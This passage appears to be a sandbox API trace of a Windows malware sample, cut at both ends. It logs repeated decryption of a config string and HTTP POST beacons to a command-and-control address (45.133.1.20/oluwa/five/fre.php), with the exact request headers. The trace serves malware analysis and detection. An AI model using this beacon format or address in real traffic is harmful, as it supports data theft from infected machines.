pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0287.442] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.443] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0287.444] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.444] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0287.444] GetProcessHeap () returned 0x6a0000 [0287.444] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0287.445] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0287.446] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0287.446] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0287.447] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0287.448] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0287.449] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0287.454] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0287.455] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0287.455] GetProcessHeap () returned 0x6a0000 [0287.456] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0287.456] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0287.456] GetProcessHeap () returned 0x6a0000 [0287.457] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0287.457] GetProcessHeap () returned 0x6a0000 [0287.458] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0287.459] GetProcessHeap () returned 0x6a0000 [0287.459] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0287.459] GetProcessHeap () returned 0x6a0000 [0287.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0287.461] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.462] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0287.469] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.469] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0287.483] GetProcessHeap () returned 0x6a0000 [0287.483] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0287.484] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.484] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0287.485] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.485] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0287.486] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.486] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0287.486] GetProcessHeap () returned 0x6a0000 [0287.487] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0287.488] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.488] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0287.489] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.489] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0287.490] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.490] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0287.490] GetProcessHeap () returned 0x6a0000 [0287.490] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0287.491] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0287.491] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0287.492] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0287.492] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0287.493] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0287.493] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0287.494] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0287.494] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0287.494] GetProcessHeap () returned 0x6a0000 [0287.494] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0287.494] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0287.494] GetProcessHeap () returned 0x6a0000 [0287.494] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baad0 [0287.494] socket (af=2, type=1, protocol=6) returned 0xa9c [0287.495] connect (s=0xa9c, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0287.521] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0287.522] GetProcessHeap () returned 0x6a0000 [0287.522] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf168 [0287.522] GetProcessHeap () returned 0x6a0000 [0287.522] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d9318 [0287.522] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0287.523] wvsprintfA (in: param_1=0x6d9318, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0287.523] GetProcessHeap () returned 0x6a0000 [0287.523] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6c6580 [0287.523] GetProcessHeap () returned 0x6a0000 [0287.524] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9318 | out: hHeap=0x6a0000) returned 1 [0287.524] GetProcessHeap () returned 0x6a0000 [0287.524] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0287.524] GetProcessHeap () returned 0x6a0000 [0287.524] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d9318 [0287.525] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0287.526] wvsprintfA (in: param_1=0x6d9318, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0287.526] GetProcessHeap () returned 0x6a0000 [0287.526] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0287.526] GetProcessHeap () returned 0x6a0000 [0287.526] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9318 | out: hHeap=0x6a0000) returned 1 [0287.527] send (s=0xa9c, buf=0x6bd460*, len=242, flags=0) returned 242 [0287.527] send (s=0xa9c, buf=0x6bb998*, len=159, flags=0) returned 159 [0287.527] GetProcessHeap () returned 0x6a0000 [0287.527] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0287.527] recv (in: s=0xa9c, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0287.609] GetProcessHeap () returned 0x6a0000 [0287.610] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0287.610] GetProcessHeap () returned 0x6a0000 [0287.610] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0287.610] GetProcessHeap () returned 0x6a0000 [0287.610] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6580 | out: hHeap=0x6a0000) returned 1 [0287.611] GetProcessHeap () returned 0x6a0000 [0287.611] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf168 | out: hHeap=0x6a0000) returned 1 [0287.611] closesocket (s=0xa9c) returned 0 [0287.611] GetProcessHeap () returned 0x6a0000 [0287.611] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baad0 | out: hHeap=0x6a0000) returned 1 [0287.611] GetProcessHeap () returned 0x6a0000 [0287.612] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0287.612] GetProcessHeap () returned 0x6a0000 [0287.612] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0287.612] GetProcessHeap () returned 0x6a0000 [0287.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0287.613] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x15fc) returned 0xa9c [0287.615] Sleep (dwMilliseconds=0xea60) [0287.617] GetProcessHeap () returned 0x6a0000 [0287.617] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0287.617] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.618] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0287.624] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.624] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0287.631] GetProcessHeap () returned 0x6a0000 [0287.631] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6d8890 [0287.631] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.632] CryptImportKey (in: hProv=0x6befd0, pbData=0x6d8890, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0287.632] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.633] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0287.634] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.634] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0287.634] GetProcessHeap () returned 0x6a0000 [0287.634] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8890 | out: hHeap=0x6a0000) returned 1 [0287.635] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.635] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0287.637] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.637] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0287.638] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.638] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0287.638] GetProcessHeap () returned 0x6a0000 [0287.638] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0287.639] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0287.639] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0287.640] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0287.640] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0287.641] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0287.641] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0287.642] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0287.642] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0287.642] GetProcessHeap () returned 0x6a0000 [0287.642] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0287.643] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0287.643] GetProcessHeap () returned 0x6a0000 [0287.643] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0287.643] GetProcessHeap () returned 0x6a0000 [0287.644] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0287.646] GetProcessHeap () returned 0x6a0000 [0287.646] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0287.646] GetProcessHeap () returned 0x6a0000 [0287.646] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0287.647] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.647] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0287.652] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.654] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0287.661] GetProcessHeap () returned 0x6a0000 [0287.661] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0287.661] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.662] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0287.662] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.663] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0287.663] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.664] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0287.664] GetProcessHeap () returned 0x6a0000 [0287.664] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0287.665] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.666] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0287.667] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.667] CryptDestroyKey (hKey=0x6ad020) returned 1 [0287.668] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.668] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0287.668] GetProcessHeap () returned 0x6a0000 [0287.668] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0287.669] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0287.670] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0287.670] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0287.671] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0287.672] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0287.672] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0287.673] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0287.673] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0287.673] GetProcessHeap () returned 0x6a0000 [0287.673] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0287.673] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0287.673] GetProcessHeap () returned 0x6a0000 [0287.673] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab00 [0287.674] socket (af=2, type=1, protocol=6) returned 0xaa0 [0287.674] connect (s=0xaa0, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0287.696] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0287.696] GetProcessHeap () returned 0x6a0000 [0287.696] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beca0 [0287.696] GetProcessHeap () returned 0x6a0000 [0287.696] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d9318 [0287.697] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0287.698] wvsprintfA (in: param_1=0x6d9318, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0287.698] GetProcessHeap () returned 0x6a0000 [0287.698] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6c5bc0 [0287.698] GetProcessHeap () returned 0x6a0000 [0287.699] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9318 | out: hHeap=0x6a0000) returned 1 [0287.699] GetProcessHeap () returned 0x6a0000 [0287.699] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0287.699] GetProcessHeap () returned 0x6a0000 [0287.699] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d9318 [0287.700] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0287.701] wvsprintfA (in: param_1=0x6d9318, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0287.701] GetProcessHeap () returned 0x6a0000 [0287.701] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0287.701] GetProcessHeap () returned 0x6a0000 [0287.701] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9318 | out: hHeap=0x6a0000) returned 1 [0287.701] send (s=0xaa0, buf=0x6bd460*, len=242, flags=0) returned 242 [0287.702] send (s=0xaa0, buf=0x6bb998*, len=159, flags=0) returned 159 [0287.702] GetProcessHeap () returned 0x6a0000 [0287.702] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0287.702] recv (in: s=0xaa0, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0287.771] GetProcessHeap () returned 0x6a0000 [0287.771] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0287.772] GetProcessHeap () returned 0x6a0000 [0287.773] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0287.773] GetProcessHeap () returned 0x6a0000 [0287.773] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5bc0 | out: hHeap=0x6a0000) returned 1 [0287.773] GetProcessHeap () returned 0x6a0000 [0287.773] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beca0 | out: hHeap=0x6a0000) returned 1 [0287.773] closesocket (s=0xaa0) returned 0 [0287.774] GetProcessHeap () returned 0x6a0000 [0287.774] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab00 | out: hHeap=0x6a0000) returned 1 [0287.774] GetProcessHeap () returned 0x6a0000 [0287.774] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0287.774] GetProcessHeap () returned 0x6a0000 [0287.775] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0287.775] GetProcessHeap () returned 0x6a0000 [0287.775] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0287.775] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x888) returned 0xaa0 [0287.777] Sleep (dwMilliseconds=0xea60) [0287.779] GetProcessHeap () returned 0x6a0000 [0287.779] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0287.780] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.780] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0287.787] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.787] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0287.795] GetProcessHeap () returned 0x6a0000 [0287.795] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6df390 [0287.796] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.796] CryptImportKey (in: hProv=0x6bf278, pbData=0x6df390, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0287.797] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.798] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0287.799] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.799] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0287.799] GetProcessHeap () returned 0x6a0000 [0287.800] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6df390 | out: hHeap=0x6a0000) returned 1 [0287.801] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.801] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0287.802] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.803] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0287.803] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.804] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0287.804] GetProcessHeap () returned 0x6a0000 [0287.804] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0287.805] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0287.805] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0287.811] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0287.811] StrStrA 